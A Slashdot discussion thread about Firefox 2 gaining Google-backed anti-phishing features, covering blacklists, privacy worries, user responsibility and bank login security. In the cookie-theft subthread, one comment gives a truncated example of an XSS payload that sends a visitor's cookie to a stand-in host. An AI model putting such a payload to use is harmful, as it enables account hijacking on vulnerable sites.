Firefox 2 To Have Anti-Phishing Technology
Mitchell Bronze writes "Mozilla's Mike Shaver said in an interview that the upcoming Firefox 2 will have anti-phishing capability using technology that might come from Google." From the article: "With the continued rise in online attacks, security tools have become something Web browser makers can use to try to stand out. Microsoft plans to include features to protect Web surfers against online scams in Internet Explorer 7, due later in 2006. Similar functionality is already in Netscape 8 and Opera 8, both released last year. 'It is another example of the energy that has returned to the browser market,' Shaver said."
Good on ya (Score:2, Funny)
[rimshot]
Re:Good on ya (Score:5, Interesting)
And I cannot emphasize enough how great it is for my parents. By switching them to Fox and Bird, I have stopped my monthly trip up to remove all new spyware/viruses... now I just go for dinner. That gets an A+ in my book.
Re:Good on ya (Score:5, Insightful)
Yeah well, the reply on the support forums to any memory problems is always "must be extensions at fault", and it's almost certainly true. The thing is, ask me to choose between Firefox without extensions and Opera, and there is no contest, Opera wins hands down.
I think the Firefox team should be focussing on ways to ensure that extensions behave. They could do any number of things. Put together a team of people whose job it is to check extensions for obvious flaws, and make a list of "approved" extensions that pass muster. Improve the APIs used by extension developers. Work on tools to help extension developers write robust code. Seems to me more useful than some of the stuff they're working for. That's not to say they haven't done a great job so far, I just think that would be a useful thing to focus on at this point.
Re:Good on ya (Score:4, Insightful)
Open 5 or 6 IE windows, then add up the resource usage for IE, plus the resource usage of any and all spyware processes running, plus any plug-ins for IE. Compare this total usage to Firefox memory usage, having the same pages loaded in tabs.
THEN tell me Firefox is a memory hog.
Re:Good on ya (Score:3, Insightful)
Re:Good on ya (Score:4, Funny)
Re:Good on ya (Score:4, Funny)
It's most likely you just don't know how to read. The phrase "when Windows starts paging" has nothing to do with 'ps' or Linux memory management.
Re:Good on ya (Score:2)
What does Linux memory management have to do with Windows?
Re:Good on ya (Score:4, Funny)
This is Slashdot. Linux has everything to do with everything, newbie.
Re:Good on ya (Score:2)
Re:Good on ya (Score:5, Informative)
If I remember correctly, it's something to do with caching the pages. Firefox caches something like 25 previous pages you've been to... on each tab.
Maybe this isn't the actual problem -- I'm not a developer -- but it seems to have stopped the "memory leak" issue I have with Firefox 1.5+
Re:Good on ya (Score:3, Interesting)
Re:Good on ya (Score:5, Informative)
No one is denying that there are memory leaks. However, they're not common (occurring on only about 1% of visited pages) and often very hard to reproduce reliably. You can help by using the memory leak tool and reporting good memory leak bugs [dbaron.org].
Re:Good on ya (Score:3, Informative)
The Back-Forward cache causes immediate increased use of memory, just after loading a few pages. The increased memory due to memory leaks doesn't become apparent until after visiting hundreds of pages and several DOM Wi
Re:Good on ya (Score:2, Insightful)
Microsoft anti-phishing? (Score:5, Funny)
Site Blocked: www.google.com has been placed on a list of sites that link to potentially unsafe and / or phishing sites.
An opportunity, a threat... (Score:5, Interesting)
Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored. This starts with Mails that urge him to open something "really urgently", covers various plugins for Browsers that come filled with spyware (which, in turn, is a perfect door for other malware) and goes to bogus files on various P2P networks that claim to be some crack, hack or other "goodie" to lure the P2P user into starting it.
Now, you can walk the same way that antivirus companies go, you wait for the threat to unfold and grab it at its neck when you find it lurking in the system once your update covers it. That's fine as long as your releases at least match the speed of trojan development, if there is some intersection between the moment you update your anti-trojan signatures and the moment the trojan goes into a new generation.
And that window is closing. Fast. We're now facing trojans with update cycles that make you wonder when and how they create them. Currently, you face about weekly updates of some trojans. For the simple reason that there is no reason to update them more often. It is technically no problem to have them update twice a day. That's already a rate that no antivirus company could match. The AV company first of all needs to get a hold of the trojan, develop reliable signatures, create an update for the sigs and send them towards you.
Currently, AV companies can keep up with development. The trojan writers have enough clueless people without any antivirus protection who click everything and anything and allow every program to do whatever it pleases on the web, so they don't care about "us", those who have av tools and/or know how to keep their computer clean.
As soon as a browser like this hits the market, the race is on. It no longer matters if you're clueless or an IT-pro, your browser will keep you out of harm's way on everything it knows. So, to be successful, the phishers have to be faster (or develop a new strategy, whichever is easier to do).
I'm not sure if AV companies can win that game if it becomes one of update speeds. A trojan writer has to push one update for one trojan. The AV company has to push a few 100 for about as many malware programs. Not a good position for the AV guys.
My hope is that Firefox will have a different approach to the problem. Self-checking processes (to avoid injections), close scrutiny of its BHOs, etc. I hope they will not try to use AV techniques, but instead concentrate on the entry points for such a program, and try to detect it there.
Re:An opportunity, a threat... (Score:2)
Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored.
So which one is it? "The weakest link is the user" or "vulnerabilities aside, the weakest link is the user"
I would suggest that it's option B - "vulnerabilities aside, the weakest link is the user"
I would say that Slammer / Blaster / Code Red / etc infected far more people in a far shorter period of time than any via-user link.
In fact, I'
Re:An opportunity, a threat... (Score:5, Insightful)
But each of those would have been avoided if the user either kept their machines patched or (at least) kept them behind a firewall.
Re:An opportunity, a threat... (Score:2)
What you say is correct - but failing to keep your machine patched & behind a firewall is not generally what's meant by a vulnerability requiring user intervention.
When the grandparent talked about the user being the weak link in the chain, he
Re:An opportunity, a threat... (Score:2)
Re:An opportunity, a threat... (Score:2)
Windows is mostly so "insecure" because it pays to look for even the most obscure flaw in the system. That WMF exploit is a good example of a well hidden exploit. I know I'll get some flak from the anti-MS faction here for saying it, but Windows is not so much more insecure than Linux. It's just way more rewarding to spend time hunting some flaw hidden deeply in the system that requires you to jump through a million hoops in Windows.
Es
Re:An opportunity, a threat... (Score:5, Insightful)
One of the things I demand to use this system is the ability to limit how it is used, turn it off, switch it for an alternative system, or uninstall it. The best way it can be implemented is as a pre-installed plugin, making it easy to maintain for those who need alternatives.
Firefox was always intended to be plugin based, so I hope they stick to that.
Re:An opportunity, a threat... (Score:5, Insightful)
This aside, I agree that it should be possible to turn it off. Even though this would essentially kill the security of the system, but I'm firmly against handing over responsibility over my system to someone else, who I'd have to trust implicitly. And what if I don't?
But I'd also recommend delivering it with a default ON setting on the security features. Just to make sure that all those who have no clue what's going on in their computer have it ON!
Re:An opportunity, a threat... (Score:5, Insightful)
The biggest problem is still the weakest link in the system: Its user.
I very strongly disagree. There are currently many weaker links.
Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored...
Either I'm misunderstanding your statement or you are misinformed. Most infections do not currently involve human interaction measured both by number and bandwidth consumed.
Currently, you face about weekly updates of some trojans. For the simple reason that there is no reason to update them more often. It is technically no problem to have them update twice a day. That's already a rate that no antivirus company could match. The AV company first of all needs to get a hold of the trojan, develop reliable signatures, create an update for the sigs and send them towards you.
Actually, there are also self-mutating trojans that have been demonstrated that are very good at hiding and there are trojans that interfere with anti-virus.
Currently, AV companies can keep up with development. The trojan writers have enough clueless people without any antivirus protection who click everything and anything and allow every program to do whatever it pleases on the web, so they don't care about "us", those who have av tools and/or know how to keep their computer clean.
First, AV companies are not keeping up and we have seen several "zero-day" infections. More advanced intrusion detection software is becoming more and more responsible for finding new worms, viruses, and trojans on end users' systems, a significant amount of time in advance of AV signatures. These systems are not only finding them, but creating and sharing signatures among major ISPs.
Second, your depiction of the average user as people who "click everything and anything and allow every program to do whatever it pleases" is very misleading. I know security experts who have been duped by a well crafted trojan or phishing e-mail and the truth of the matter is, users are making poor choices based upon the fact that they are given poor options. Right now the average user is given the option of "open this file if it is a file or run it if it is a program and let it do anything it wants" or "don't open this file or program." Since users want to view data and install software, eventually they are bound to make the wrong choice.
It will not be until users are given more control, information, and granularity by their tools that they will be given the option of being the weakest link. UIs need to let them know what is data and what is an executable. OSes need to run executables in sandboxes by default and only allow programs to do unusual things (log other programs' keystrokes, modify the OS, access hardware directly, modify user files, connect to the internet, access the e-mail address book, access the buddy list, start a new service, modify other programs, etc.) after the user is informed in plain English and given a choice using a properly constructed UI. At this point, users will become the weakest link and not before.
As soon as a browser like this hits the market, the race is on. It no longer matters if you're clueless or an IT-pro, your browser will keep you out of harm's way on everything it knows. So, to be successful, the phishers have to be faster (or develop a new strategy, whichever is easier to do).
First, the Web is only one vector and not even the most common vector for infection. Second, blacklists will never be able to keep up, although they will help.
I'm not sure if AV companies can win that game if it becomes one of update speeds. A trojan writer has to push one update for one trojan. The AV company has to push a few 100 for about as many malware programs. Not a good position for the AV guys.
Newer intrusion detection systems are the key to mitigating this. Propagation is detectable and if you have a relational model of your network abnormal activity can be flagged, detected
Re:An opportunity, a threat... (Score:2)
It is indeed a problem that the user can only execute it or not. Then again, how many users do you see that could make a sensible decision given the information what a given program does? Worse, what if he is tricked by the program into allowing it?
Let's imagine a scenario. You're a Joe Average user. You get a mail, supposedly from your bank, telling you that they were attacked and send you this way a tool to make sure you're out of harm's way. Yo
Re:An opportunity, a threat... (Score:3, Insightful)
As soon as the user believes what the mail tells him, he will do ANYTHING you tell him. He will grant you any permit you want, actually telling him what kind of security warnings he'll get even increases your credibility. Because, well, would an attacker tell him that?
This is not true in many cases. For example, if someone can successfully trick a user into thinking an executable is from their bank, they may still become suspicious when the program tries to do certain things. These things might include r
Re:An opportunity, a threat... (Score:2)
I 100% agree.
But who are the users? Joe Sixpack (I miss that guy around here
I believe that everybody that uses the system is a user, and that the online banks and retailers are more responsible for securing the data than the "end user". Otherwise, why not just pay cash and keep our money under our mattresses? What service are the banks and online retailers providing for the average
Re:An opportunity, a threat... (Score:3, Insightful)
The problem with online banking is that you have to trust an untrustworthy client: The one on the user's side. You have no control at all over his machine. Banks don't even know who they're talking to, the trojan or to the user? And they have no way of knowing.
Especially when dealing with man in the middle attacks (the ones going 'rou
Re:An opportunity, a threat... (Score:2)
Keys and tokens. The bank gives me ID cards when I go and do business at the teller window, many have pictures embedded in them now, but they check nothing besides a minimum of 4 character ASCII string when I do online banking.
They also have cameras at banks, they have a finite storefront, compared to the internet where it's almost infinite as to who or what script can "go to
Re:An opportunity, a threat... (Score:2)
In other words, whatever keys you have, the trojan does as well. At some point, it HAS to go into the computer, and that's when the trojan gets access to it.
Banks ARE secure. The point of attack is the user's PC.
Here's to hoping... (Score:3, Funny)
Re:Here's to hoping... (Score:3)
Re:Here's to hoping... (Score:2)
More appropriate as an extension? (Score:5, Insightful)
Seems like something that could be its own extension, or if Google is really so involved, integrated into the Google Toolbar for Firefox.
Re:More appropriate as an extension? (Score:5, Insightful)
Yes.
The users most susceptible to phishing are also the ones least likely to seek out and install an extension ("what's that?") to prevent it.
If more savvy users are concerned about bloat perhaps this protection could be optional with the default for it to be turned on.
Re:More appropriate as an extension? (Score:2)
Re:More appropriate as an extension? (Score:5, Informative)
After all, the technology is a sole contribution of Google and their Safe Browsing extension http://www.google.com/tools/firefox/safebrowsing/ [google.com]
For more detail regarding the implementation see http://wiki.mozilla.org/Safe_Browsing [mozilla.org]
Re:More appropriate as an extension? (Score:5, Insightful)
Re:More appropriate as an extension? (Score:2)
Kind of like Microsoft does.
Re:More appropriate as an extension? (Score:2)
All I'm saying is that email is just a new delivery vehicle for the same tired old scam, rehashed for the 21st century.
The best way to prevent these attacks is to make it harder for the scammers to win.
By that logic... (Score:2)
But the users most susceptible to phishing are also the ones least likely to seek out and install an alternative browser.
Re:More appropriate as an extension? (Score:5, Informative)
Re:More appropriate as an extension? (Score:3, Interesting)
Re:More appropriate as an extension? (Score:5, Informative)
TFA: Seems like something that could be its own extension, or if Google is really so involved, integrated into the Google Toolbar for Firefox.
TFA:
Re:More appropriate as an extension? (Score:3, Informative)
It already is an extension... (Score:2)
It basically checks websites you visit against its database and tells you if they are considered dangerous or what have you.
Re:It already is an extension... (Score:3, Interesting)
So it reports my surfing to google's database? Thanks but no thanks. I've never fallen prey to phishing attacks, and don't want a feature like that logging all the pr0n sites I visit. Wait, the only pr0n site I need is google images now anyway haha!
Why should we trust google? They are looking out for their shareholder, not the end user.
Re:It already is an extension... (Score:2)
If you honestly consider what websites you visit to be some kind of major secret, then by all means, don't use these sort of extensions.
Me, I don't much care who knows what websites I go to. It's just not a major secret that I read slashdot and digg and a few other online forums and such.
As for porn... dude, porn websites are so late 90's. Go retro with usenet!
Re:More appropriate as an extension? (Score:2)
An extension would protect people who don't need protection.
A better solution is one that by default puts a warning over any dubious link and lets the user decide. If you're an expert user and the warning annoys you, you are in a position to disable it from the prefs. Everyone else can benefit from greater security
Smart move (Score:5, Interesting)
Re:Smart move (Score:2)
Since the updates would happen when you're online - why wouldn't you be able to update? If you can check your email you can get the updates...right?
I like AVG much better than any other anti-virus - even without specific detection rules it can guess (with a reasonable degree of accuracy) if a file is infected or not.
I agree with that, however a Bayesian t
Already there (Score:5, Informative)
Is this a free alternative to Verisign? (Score:5, Interesting)
Verisign [verisignsecured.com] already has this kind of technology, the question is, will Firefox 2 make Verisign obsolete?
Verisign's advice: [verisignsecured.com] The best way to avoid becoming a victim of phishing is to never respond to unsolicited emails asking for personal information or directing you to a Web site where you are asked to enter personal information--even if it looks TOTALLY official.
Click OK (Score:4, Funny)
Enter information and click OK to find out
Name:_________________________________
Billing Address:__________________________________
Credit Card Type:________________
Credit Card Number:_______________________________
Expiration Date:___/___
Now be an idiot and click OK to let me steal your info.
Re:Click OK (Score:3, Funny)
Name:_Ford_Prefect__________
Billing Address:_72_Borchester_Road,_Ambridge,_Borchester
Credit Card Type:_VISA__________
Credit Card Number:_4242-0563-1337-0584______
Expiration Date:Mar/2008
P.S.: I'm using Safari!
Privacy concerns? (Score:5, Interesting)
STOP CALLING IT TECHNOLOGY!!! (Score:2, Insightful)
Thinking up ways to warn people about phishing
It's sad, really (Score:5, Insightful)
Guess I have to change the browser then (Score:3, Insightful)
Unless you can disable this "feature" or it works completely differently, I'd consider Firefox 2 spyware.
Re:Guess I have to change the browser then (Score:5, Informative)
Google tells you exactly what the feature is, and throws the option to enable or disable it in your face, and yet you still whine about it.
Re:Guess I have to change the browser then (Score:2)
Re:Guess I have to change the browser then (Score:2)
The problem with that, is that someday, someone may decrypt their anti-phishing database (because putting it in plain text would be monstrously stupid) and then overwrite it when some new FF exploit shows up.
That's the only legitimate reason I thought of.
Of course, if they're going to be sneaky about it, there's no reason malware writers couldn't just overwrite your hosts file to redir
Re:Guess I have to change the browser then (Score:2)
Re:Guess I have to change the browser then (Score:2)
Re:Guess I have to change the browser then (Score:2)
Perhaps it's my comment [slashdot.org] you're referring to.
Online scams? (Score:5, Funny)
> Microsoft plans to include features to protect Web surfers
> against online scams in Internet Explorer 7
Wouldn't it have been easier just to not program the online scams into Internet Explorer 7 in the first place? I just don't understand Microsoft's new security procedures at all!
Damnit (Score:5, Interesting)
Seriously, I'll tell you the only anti-phishing technology we need: our damn heads, with a side of common sense.
I don't want my browser to have stupid coddling features like this that will just get in the way of a decent, savvy surfer. That's the problem with popularity - it leads to diluting the quality. I'd rather have a *good* browser only used by 3% of the people out there. Hell, the mere minority status might even make it *better* - now that Firefox is popular, more and more sites are finding ways of advertising specifically to it.
If Firefox 2 does have this, then it better be easy to fully disable, otherwise I'm definitely not upgrading.
Re:Damnit (Score:3, Insightful)
Re:Damnit (Score:2, Interesting)
Good (Score:3, Interesting)
Re:Good (Score:2)
Actually, I think I got stuck testing it just to piss me off.
What about cookie theft prevention? (Score:4, Insightful)
Re:What about cookie theft prevention? (Score:2)
To what specifically are you referring when you say "cookie redirection"? It sounds to me more like the online game you were playing has an XSS security hole. In that case, there's no "cookie redirection" going on, it's you accessing your game account in a way the online game tells your browser to. The fact that the online game was tricked into doing so isn't something a browser can ascertain, because it's something that happens between the attacker and the game.
Re:What about cookie theft prevention? (Score:2)
When a user is able to add their own scripting on someone else's site. Sites like myspace and neopets, for example, allow users to add video, pics, etc. to their pages on a website. If they were able to add Javascript like:
<a href="#" onclick="window.location='http://example.com/stole
then they could snag your cookie and access your account. Make it onlo
Re:What about cookie theft prevention? (Score:2)
From the browser's perspective, there's no "user" code and "website" code, it's all "website" code. So it becomes an issue of telling the difference between a website telling the browser to do something benign, and a website telling the browser to do something harmful. Can you think of a good way of differentiating between the two? That won't break things for legitimate users?
Saying that "Ideally, the website should restrict..." is a huge understatement. Such websites are simply insecure, and should
Open source a problem here? (Score:3, Interesting)
(Seriously. If not, please post why not and educate me.)
Re:Open source a problem here? (Score:2)
It is something like with encryption, the fact that OpenSSH source code is available does not make the encryption algorithms less secure, it is the design of the algorithms what is secure.
Re:Open source a problem here? (Score:5, Informative)
(Seriously. If not, please post why not and educate me.)
No, it won't, for the simple reason that obscurity does not provide security. Whether the source code is available or not, it's always possible for a smart hacker to figure out how a program works. So whenever you're doing anything related to security, you assume that the bad guy knows every last detail about how your code does what it does. And you design your code so that that doesn't matter.
For example, if you're blocking phishing attempts by having a database of known phishing sites (which is how the Netcraft toolbar works, IIRC), then it doesn't really help the phishers to know the details of exactly how your browser connects to the database and looks up their URL in it. Because even though they know what's happening, there isn't actually anything they can do to stop it happening.
I suppose there are schemes that could be defeated by seeing the source. For example, a naive scheme that tried to identify phishing sites by running a fixed series of tests on them (check if site is in Russia but claims to be American bank, check URL to see if it contains dodgy characters, etc) would be slightly weaker in open source code because the tests would be visible for all to see. But such a scheme would be basically useless anyway - not because it's open source, but because it would be a fundamentally weak technique.
Anti-phishing should be done at the website level (Score:4, Informative)
Companies should be responsible for protecting their users, and this struck me as a rather good way of doing that. Granted, if someone really wanted to, they could set up a site just to scarf your user id, log in with that id to snag your site key, then create another site with the site key included to gank your password - but that's a lot of work.
Re:Anti-phishing should be done at the website lev (Score:3, Insightful)
The real answer, IMHO, is using public keys for authorisation, as you're then never sending anything that can be used again. Man in the middle attacks are still possible if you can persuade the user to accept the wrong server certificate, but it's as good as it gets, IMHO.
The user's key doesn't even have to be signed - ju
Re:Anti-phishing should be done at the website lev (Score:2)
Why does it ask me to log in, then to - essentially - log in again?
And bookmarks to the sitekey login page do not work.
I use online banking way too much to tolerate such bullshit. I thought about switching banks to get away from sitekey!
Almost as annoying as their autotimeout, which thankfully my friend wrote a greasemonkey script to nullify.
They put so much effort into making their site secure and hard to phish that they made it a royal fucking pain in the a
anti-phishing == no passwords (Score:5, Insightful)
When are people going to realize that passwords are not secure. Ever. Even if you pick a "good" password and change it every 13 minutes like a good boy, they are still not secure.
Why? It's too easy to snag the password from social engineering or some other means or even by accident.
I walked out of the bank disgusted when I went to get a private lock box, and it did not have a key given to me, and the bank had the other key like before. No, now they wanted me to remember a password, and enter it into a computer to unlock my box.
OK. I made that up, because even banks are not stupid enough to do this, but they open up the account online to any bozo that has a password.
My bank recently initiated an "anti-phishing" technology where it uses cookies stored on my computer and if the bank does not recognize my computer it displays a picture that I set up in the past with a caption that I selected for the picture, and then it's supposed to be OK to put in my password now because the site is providing evidence that the bank and not some guy from China or Russia is asking for my password.
However, I carry many bank cards in my wallet, and they work excellent at stores and ATMs, but they don't fit into any holes into my computer. The bank has already given me an excellent token that is much more difficult to replicate than a few random characters on a keyboard, but they refuse to use it.
OK, I have to go and change my passwords now, it's that time of year....
Re:anti-phishing == no passwords (Score:2, Interesting)
Re:anti-phishing == no passwords (Score:3, Insightful)
Re:anti-phishing == no passwords (Score:3, Insightful)
OK, remind me. Money has been around how long?
Fighting "phishing", user education, and global law enforcement is very, very new and nonexistent at this time.
I'm arguing that passwords are causal, and not correlational here.
I've never been "phished" for the key to my house, nobody but someone I already trust to some degree deserves that, but when online banks _refuse_ to put their login page on a SSL secured site, an
Re:anti-phishing == no passwords (Score:2)
OK. I made that up, because even banks are not stupid enough to do this.
Why would they? Did you miss the 5-10 surveillance cameras scanning the teller front line when you walked in?
Brilliant Idea (Score:2)
Coloured URLs and URLs displayed always (Score:3, Insightful)
- colouring of URLs in the address bar, or something else, that would allow the novice user to easily identify the user name element of a URL. I have already seen URLs of the form (http excluded):
- even in a window that has no tool bar or status bar, there should always be a status bar that displays the page's address.
Re:Coloured URLs and URLs displayed always (Score:3, Informative)
Opera solves it by displaying "You're about to go to address containing username" and displays which one is username and which is server name.
Mozilla's Current Documentation (Score:2, Informative)
Here is some design documentation for the safe browsing add-on: http://wiki.mozilla.org/Safe_Browsing:_Design_Documentation [mozilla.org]
Here is the Bugzilla bug for turning on the feature. Remember that you have to copy and paste the link into the address bar because Bugzilla blocks slashdot. https://bugzilla.mozilla.org/show_bug.cgi?id=329292 [mozilla.org]
From what I understand, the idea is to make the feature an extension that is installed by default, kind of like the talkback error reporting tool. In "normal mode", th
Is this a web browser or SMTP client issue? (Score:2)
And speaking of anti-phishing, how about a program that flood
Phishing in Firefox / Mozilla - a long lived issue (Score:5, Insightful)
Anyway, I'd argue that Thunderbird needs it much more than Firefox. Most phishing starts with the inbox. Links in email that use dodgy hex encoding, raw IPs, IPv6, point to domains that differ from the anchor text etc. should be highlighted. And popular targets such as banks, eBay, Paypal, Amazon etc. should be explicitly identified. I'd also like Thunderbird to add a phishing filter rule so that I can automatically toss the 20+ phishing emails I get a day straight in the junk folder without accidentally training the Bayesian filter to kill genuine emails from Amazon, PayPal etc.
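The link checks asked for in the comment above (hex-encoded hosts, raw IPs, IPv6 literals, anchor text that differs from the real target), together with the user name element of a URL raised in the "Coloured URLs" comment, sketched as an added example. This is not code from the thread, Thunderbird or Firefox; the function names, flag names and the sample message are constructed for illustration.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Host written as hex/octal/dword numbers, e.g. 0xC0.0x00.0x02.0x0A or 3221225994
_NUMERIC_HOST = re.compile(r"^(0x[0-9a-f]+|\d+)(\.(0x[0-9a-f]+|\d+)){0,3}$", re.I)
# Visible link text that itself looks like a host name or URL
_TEXT_HOST = re.compile(r"^(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:[/:?#]|$)", re.I)


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _bare(host):
    """Lower-case a host and drop a leading 'www.' before comparing."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def link_flags(href, text=""):
    """Return the sorted warning flags (hypothetical names) for one link."""
    flags = set()
    parts = urlsplit(href)
    host = parts.hostname or ""
    if parts.username is not None:
        # http://bank@attacker/ : everything before '@' is a user name, not the site
        flags.add("userinfo")
    if "%" in parts.netloc:
        flags.add("encoded-authority")
    try:
        ip = ipaddress.ip_address(host)
        flags.add("raw-ipv6" if ip.version == 6 else "raw-ip")
    except ValueError:
        if _NUMERIC_HOST.match(host):
            flags.add("obfuscated-ip")
    shown = _TEXT_HOST.match(text)
    if shown and _bare(shown.group(1)) != _bare(host):
        flags.add("text-mismatch")
    return sorted(flags)


def scan_message(html):
    """Return [(href, flags)] for every link in an HTML mail body that has flags."""
    collector = _AnchorCollector()
    collector.feed(html)
    report = []
    for href, text in collector.links:
        flags = link_flags(href, text)
        if flags:
            report.append((href, flags))
    return report


# Constructed sample body; hosts use reserved documentation names and addresses.
SAMPLE_HTML = (
    '<p>Dear customer, please confirm your details at '
    '<a href="http://www.example-bank.test@192.0.2.10/login">www.example-bank.test</a></p>'
    '<p><a href="https://www.example.com/account">example.com</a></p>'
    '<p><a href="http://0xC0.0x00.0x02.0x0A/">Sign in</a></p>'
)

if __name__ == "__main__":
    for href, flags in scan_message(SAMPLE_HTML):
        print(href, flags)
```

A highlighter in a mail client would colour each flagged link rather than print it; the flags are heuristics and say nothing about links that carry none.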
Site Advisor (Score:2)
Verbatim from the site:
About SiteAdvisor
SiteAdvisor is a consumer software company founded in April 2005 by a group of MIT engineers who wanted to make the Web safer for their family and friends. Having spent one too many holiday breaks trying to clean a mess of spam, adware, and spyware from our families' computers, we decided to take action.
We realized there was a gaping hole in existing Web security products. While traditional security companies had gotten relatively good at addressi
Re:Netscape (Score:2)
Re:Firefox not for geeks anymore? (Score:2, Insightful)
Will Firefox not pop up a warning, saying something akin to "Hey, you can go ahead and visit this site if you like, but we think it might be a bit fishy"? Doesn't seem that bad.
I would assume that Firefox won't prevent you from accessing a certain site, since I can't imagine the Mozilla Foundation wanting to coordinate universal white-/black-lists.
Re:Firefox not for geeks anymore? (Score:2)
That's a little bit too long for "most" users, which have entered the habit of clicking on everything.
The correct prompt to open up is "Are you a terrorist? \n Only terrorists may access this site.", with yes/no. This prompt is accurate, since these phishers probably support some gang or terrorism group. In addition, you'd have
Re:Now IE fans... (Score:3, Insightful)
The summary already states that this kind of antiphishing is already available in Netscape 8, Opera and several toolbars and extensions.
At least the grand parent said 'their' meaning that only fools will believe that this is original to MS.
Re:Now IE fans... (Score:2, Insightful)
Re:Now IE fans... (Score:2)
Tabs have been around for a while and really aren't necessary. Most of us power users have gotten used to them and actually require them to be productive.
RSS, take it or leave it. That's a natural evolution towards information gathering and any user application is going to get it regardless of 'who got it first'.
The anti-Phishing is nothing more than user security. Firefox has been under constant development for a while so why can't this be on their roadmap and i